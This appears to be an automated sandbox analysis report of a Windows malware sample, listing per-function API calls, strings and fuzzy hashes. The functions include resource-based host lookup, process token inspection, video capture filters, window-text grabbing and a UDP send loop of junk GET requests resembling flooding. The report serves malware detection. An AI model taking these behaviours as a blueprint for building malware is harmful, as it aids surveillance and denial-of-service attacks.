                        • API ID: CharNext$free$AttributesCreateDirectoryErrorFileLastlstrcpylstrlenmalloc
                        • String ID:
                        • API String ID: 3289936468-0
                        • Opcode ID: 59a119cb7c45412126a605b886d4178d9102734befa52582713f9f64ecd8ef38
                        • Instruction ID: 2804081b43a571549ff13c6442801562d5d8ebc32c66b6e44589b798cfba9b7b
                        • Opcode Fuzzy Hash: 59a119cb7c45412126a605b886d4178d9102734befa52582713f9f64ecd8ef38
                        • Instruction Fuzzy Hash: 8A415171C046A59FF711CF5888447EABBE9FF0A7E0F10056AE9E1A3285D3741B428BA5
                        Function 1000D0D0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 134fileCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000D102
                          • Part of subcall function 100098B0: ??2@YAPAXI@Z.MSVCRT(00000400,?,74DF0F10,74DF2EE0,10002CFA,?,SSSSSS), ref: 100098B8
                          • Part of subcall function 100098B0: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 100098D9
                          • Part of subcall function 100098B0: LoadResource.KERNEL32(?,00000000), ref: 100098E1
                          • Part of subcall function 100098B0: LockResource.KERNEL32(00000000), ref: 100098E8
                          • Part of subcall function 100098B0: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009914
                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 1000D1B9
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 1000D1C8
                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 1000D1D1
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 1000D1E4
                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000), ref: 1000D20C
                        • CloseHandle.KERNEL32(00000000), ref: 1000D215
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileResource$??2@??3@$CloseCreateDirectoryFindHandleLoadLockReadSizeSystem
                        • String ID: .key$XXXXXX
                        • API String ID: 710762369-2601115946
                        • Opcode ID: 960c52ec033d5b8126c188698e3d9020b8b630395b08c1ecb4395ca261ac0106
                        • Instruction ID: 5581ddf27e347247a7fb535f9d70361da8d6f8714698d154567c7804f2d0400d
                        • Opcode Fuzzy Hash: 960c52ec033d5b8126c188698e3d9020b8b630395b08c1ecb4395ca261ac0106
                        • Instruction Fuzzy Hash: 93313B716006082FE318DA788C55A6B768BFBC5370F140B2DFA67872D1EDB49D0986A1
                        Function 10019520 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 317comCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 10019AF0: CoCreateInstance.OLE32(10070464,00000000,00000001,100703A4,?,?,?,?,?,10019543,?,?), ref: 10019B0E
                          • Part of subcall function 10019AF0: CoCreateInstance.OLE32(10070474,00000000,00000003,10070394,?,?,?,?,?,10019543,?,?), ref: 10019B22
                        • CoCreateInstance.OLE32(100703D4,00000000,00000001,100703E4,?,?,Capture Filter,?,?,?,?), ref: 1001958D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateInstance
                        • String ID: *,$Capture Filter$Grabber$iavs$vids
                        • API String ID: 542301482-3686165303
                        • Opcode ID: be9dc0dd849007bed87e914a06724835c3182501307860bfc12579933516edb0
                        • Instruction ID: ba961f77ed63549915f5db2d7bb8238210d4239eb663d98b2e14bda2b524e854
                        • Opcode Fuzzy Hash: be9dc0dd849007bed87e914a06724835c3182501307860bfc12579933516edb0
                        • Instruction Fuzzy Hash: EBC116B86047019FD714CF29C894A1AB7E9FF88714F108A5CF996DB3A1DB34E846CB61
                        Function 10012910 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 106COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 100127B0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,74DF0F10,74DF0F00,74DF2EE0,10002D11,Rstray.exe), ref: 100127B8
                          • Part of subcall function 100127B0: ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,74DF0F10,74DF0F00,74DF2EE0,10002D11,Rstray.exe), ref: 100127C4
                          • Part of subcall function 100127B0: Process32First.KERNEL32(00000000,00000000), ref: 100127D6
                          • Part of subcall function 100127B0: _strcmpi.MSVCRT ref: 100127E8
                        • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 10012975
                        • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 1001298F
                        • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 100129B5
                        • ??2@YAPAXI@Z.MSVCRT(?), ref: 100129C2
                        • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 100129E4
                        • ??2@YAPAXI@Z.MSVCRT(00000100), ref: 10012A06
                        • LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000100,?,00000104,?), ref: 10012A36
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@Token$InformationOpenProcess$AccountCreateFirstLookupProcess32SnapshotToolhelp32_strcmpi
                        • String ID: explorer.exe
                        • API String ID: 2062827286-3187896405
                        • Opcode ID: db4a848623fc774571cc2e19b1a1c1f5b186ca9992906693b5c3e3ec49fb7def
                        • Instruction ID: b2e4f4ef2825314356661bba0bcf310c657f9a92968df79a70ce3ff17c881b44
                        • Opcode Fuzzy Hash: db4a848623fc774571cc2e19b1a1c1f5b186ca9992906693b5c3e3ec49fb7def
                        • Instruction Fuzzy Hash: CE411CB1D10228ABDB11DF95DD85BDEBBB8FF48710F10415AF509E7240D6706980CFA1
                        Function 1000A9C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 103fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 1000A9ED
                          • Part of subcall function 100098B0: ??2@YAPAXI@Z.MSVCRT(00000400,?,74DF0F10,74DF2EE0,10002CFA,?,SSSSSS), ref: 100098B8
                          • Part of subcall function 100098B0: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 100098D9
                          • Part of subcall function 100098B0: LoadResource.KERNEL32(?,00000000), ref: 100098E1
                          • Part of subcall function 100098B0: LockResource.KERNEL32(00000000), ref: 100098E8
                          • Part of subcall function 100098B0: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009914
                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000AA12
                        • wsprintfA.USER32 ref: 1000AA87
                        • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 1000AAA3
                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000AAC7
                        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 1000AACE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Resource$Filewsprintf$??2@??3@CloseCreateDirectoryFindHandleLoadLockSystemWrite
                        • String ID: Ball\$XXXXXX
                        • API String ID: 1973673485-3982136319
                        • Opcode ID: 7297c3a35fe4b4f02ae8765d71dd86beb2f52239b6f261adb1cb4e129df90550
                        • Instruction ID: de5178c9449cd941919d7e354767f637b9ad306068a8253cfda28b2b1ae140fc
                        • Opcode Fuzzy Hash: 7297c3a35fe4b4f02ae8765d71dd86beb2f52239b6f261adb1cb4e129df90550
                        • Instruction Fuzzy Hash: D731F63220070427E728CA74CC56BBB7396EBC4721F444B2DFA62972C0DEF4AE088655
                        Function 00403DDD Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100fileCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00403E4A
                        • GetStdHandle.KERNEL32(000000F4,00406360,00000000,?,00000000,00000000), ref: 00403F20
                        • WriteFile.KERNEL32(00000000), ref: 00403F27
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: File$HandleModuleNameWrite
                        • String ID: ...$<program name unknown>$HB$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                        • API String ID: 3784150691-2703363937
                        • Opcode ID: f717f11deb201dad7ae5af87787efbf00a48da8aada41b396d2cdb4a947c31a7
                        • Instruction ID: 3a94ef448c9afaef0a32ab9c24a7d2e2257f3dbe680842ec591f5d33ab00a377
                        • Opcode Fuzzy Hash: f717f11deb201dad7ae5af87787efbf00a48da8aada41b396d2cdb4a947c31a7
                        • Instruction Fuzzy Hash: CF31A572A40218AEEF20EBA1DC45FDA77ACDB85304F50007BF645F61C0D678EA458A5D
                        Function 10004D90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67networksleepthreadCOMMON
                        Download Yara Rule
                        APIs
                        • WSAStartup.WS2_32(00000202,?), ref: 10004DA4
                        • socket.WS2_32(00000002,00000002,00000011), ref: 10004DC1
                        • htons.WS2_32 ref: 10004DEA
                        • inet_addr.WS2_32(1007DDAC), ref: 10004DFA
                        • sendto.WS2_32(00000000,GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#,?,00000000,?,00000010), ref: 10004E29
                        • Sleep.KERNEL32(00000028,?,00000000,?,00000010,00000002), ref: 10004E32
                        • RtlExitUserThread.NTDLL(00000000), ref: 10004E3F
                        Strings
                        • GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#, xrefs: 10004DAA, 10004E23
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitSleepStartupThreadUserhtonsinet_addrsendtosocket
                        • String ID: GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#
                        • API String ID: 3602400006-4039768343
                        • Opcode ID: c1f556c251400657eb1e30c84827f264690a61401817fbe1cb207322a6700dcd
                        • Instruction ID: 90c71b7bb6e61d30f0624594ab345b76b042f5c92a6c2ebc0559afc57d846c9e
                        • Opcode Fuzzy Hash: c1f556c251400657eb1e30c84827f264690a61401817fbe1cb207322a6700dcd
                        • Instruction Fuzzy Hash: 6111B2751043A16BF300DF34CC49B6A7BA5FF89754F000A1EF591972E1EBB48D09876A
                        Function 00404BEB Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00403F01,?,Microsoft Visual C++ Runtime Library,00012010,?,00406360,?,004063B0,?,?,?,Runtime Error!Program: ), ref: 00404BFD
                        • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00404C15
                        • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00404C26
                        • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00404C33
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                        • API String ID: 2238633743-4044615076
                        • Opcode ID: f3d9b38339054170dee7f7c13b53dafa238c8ef8bd6e845d137870cf324b1691
                        • Instruction ID: fe66ae4341d90bc739ec6e5161b9fd1c2a97fef559cf143139a0882326c23769
                        • Opcode Fuzzy Hash: f3d9b38339054170dee7f7c13b53dafa238c8ef8bd6e845d137870cf324b1691
                        • Instruction Fuzzy Hash: AB01B5B1304311DBD7209FB59C80E2B3AE8A6C4750392043BA201E22A1DB798C66DB6C
                        Function 1000E370 Relevance: 13.7, APIs: 9, Instructions: 205registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 1000E38A
                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 1000E3BC
                        • LocalAlloc.KERNEL32(00000040,?), ref: 1000E41B
                        • malloc.MSVCRT ref: 1000E45C
                        • malloc.MSVCRT ref: 1000E467
                        • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,?,?), ref: 1000E4EE
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: malloc$AllocEnumInfoLocalOpenQueryValue
                        • String ID:
                        • API String ID: 574313380-0
                        • Opcode ID: f68634cb85ce996d8ca971fb5f34a9b34359b1a106f598c3223e6df0ddde21a8
                        • Instruction ID: bb9a7d347bb041ea3a9a040723aaed71b44e7cb60e8ddc26bc67e4ff82bae617
                        • Opcode Fuzzy Hash: f68634cb85ce996d8ca971fb5f34a9b34359b1a106f598c3223e6df0ddde21a8
                        • Instruction Fuzzy Hash: B461AD716083559FD318CF28C880A6BBBEAEBC8794F44492DF58AD7350D671EE05CB92
                        Function 00404EBF Relevance: 13.7, APIs: 9, Instructions: 177COMMON
                        Download Yara Rule
                        APIs
                        • LCMapStringW.KERNEL32(00000000,00000100,0040642C,00000001,00000000,00000000,00000103,00000001,00000000,?,004043AC,00200020,00000000,?,00000000,00000000), ref: 00404F01
                        • LCMapStringA.KERNEL32(00000000,00000100,00406428,00000001,00000000,00000000,?,004043AC,00200020,00000000,?,00000000,00000000,00000001), ref: 00404F1D
                        • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,004043AC,?,00000103,00000001,00000000,?,004043AC,00200020,00000000,?,00000000,00000000), ref: 00404F66
                        • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,004043AC,00200020,00000000,?,00000000,00000000), ref: 00404F9E
                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,004043AC,00200020,00000000,?,00000000), ref: 00404FF6
                        • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,004043AC,00200020,00000000,?,00000000), ref: 0040500C
                        • LCMapStringW.KERNEL32(00000000,?,004043AC,00000000,004043AC,?,?,004043AC,00200020,00000000,?,00000000), ref: 0040503F
                        • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,004043AC,00200020,00000000,?,00000000), ref: 004050A7
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: String$ByteCharMultiWide
                        • String ID:
                        • API String ID: 352835431-0
                        • Opcode ID: 6d3657f98f60a207bc577e76de786c6caa3711f3d369ee5d4e84ee35ea663fe1
                        • Instruction ID: c68f3dabe40d83361ce39872f2a0007b0c438f6f028ced7926cde76c164a2d90
                        • Opcode Fuzzy Hash: 6d3657f98f60a207bc577e76de786c6caa3711f3d369ee5d4e84ee35ea663fe1
                        • Instruction Fuzzy Hash: 8F517A72500609EFCF218F94DD45A9F7FB9EB49740F20413AF915B22A0D33A8921DFA9
                        Function 10019150 Relevance: 13.6, APIs: 9, Instructions: 105COMMON
                        Download Yara Rule
                        APIs
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A42B,000000FF,10019138), ref: 10019198
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A42B,000000FF,10019138), ref: 100191AE
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,1006A42B,000000FF,10019138), ref: 100191C8
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A42B,000000FF,10019138), ref: 100191EA
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A42B,000000FF,10019138), ref: 100191FA
                        • CloseWindow.USER32(?), ref: 10019209
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,1006A42B,000000FF,10019138), ref: 10019213
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A42B,000000FF,10019138), ref: 10019237
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A42B,000000FF,10019138), ref: 1001924E
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??3@$Close$HandleWindow
                        • String ID:
                        • API String ID: 3237098652-0
                        • Opcode ID: 6ebae71b9889a50d7698d25c25ed4ee76a838a70805ed3283fe6ed3b9e27f439
                        • Instruction ID: 3f3fa4b0f2629bf46d15d3f9be3c4c2593fc33d32d1ab2c115334ec77ff2c56e
                        • Opcode Fuzzy Hash: 6ebae71b9889a50d7698d25c25ed4ee76a838a70805ed3283fe6ed3b9e27f439
                        • Instruction Fuzzy Hash: 74419CB9600B419FC724CF69C980916B7FAFF897007448A2DE14A8BB21D731FC84CBA1
                        Function 100121D0 Relevance: 13.6, APIs: 9, Instructions: 73stringmemorysleepCOMMON
                        Download Yara Rule
                        APIs
                        • GetWindowTextA.USER32(?,?,00000400), ref: 100121FF
                        • IsWindowVisible.USER32(?), ref: 10012206
                        • lstrlen.KERNEL32(?), ref: 1001221F
                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 1001222D
                        • lstrlen.KERNEL32(?), ref: 1001223A
                        • Sleep.KERNEL32(00000001), ref: 10012243
                        • LocalSize.KERNEL32 ref: 1001224A
                        • LocalReAlloc.KERNEL32(?,?,00000042), ref: 10012259
                        • lstrlen.KERNEL32(?,?,?,00000042), ref: 10012270
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Locallstrlen$AllocWindow$SizeSleepTextVisible
                        • String ID:
                        • API String ID: 2862634755-0
                        • Opcode ID: 71c19960e703c33ae2d1a6b21add6958f0f5a92c079f6a1746d4dbd94e46fd60
                        • Instruction ID: 5eb06bed97a335b8234b3696713a2b12a2f981ab1a7416895ae039800fdcde67
                        • Opcode Fuzzy Hash: 71c19960e703c33ae2d1a6b21add6958f0f5a92c079f6a1746d4dbd94e46fd60
                        • Instruction Fuzzy Hash: A121A4B2200355AFE714DF64CC85AAB73E9FB88304F01082CFB1697240EBB4E949CB65
                        Function 10012B10 Relevance: 13.6, APIs: 9, Instructions: 66threadstringCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 10012B22
                        • GetThreadDesktop.USER32(00000000), ref: 10012B29
                        • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 10012B56
                        • OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 10012B61
                        • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 10012B8E
                        • lstrcmpiA.KERNEL32(?,?), ref: 10012B9D
                        • SetThreadDesktop.USER32(00000000), ref: 10012BA8
                        • CloseDesktop.USER32(00000000), ref: 10012BC0
                        • CloseDesktop.USER32(00000000), ref: 10012BC3
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
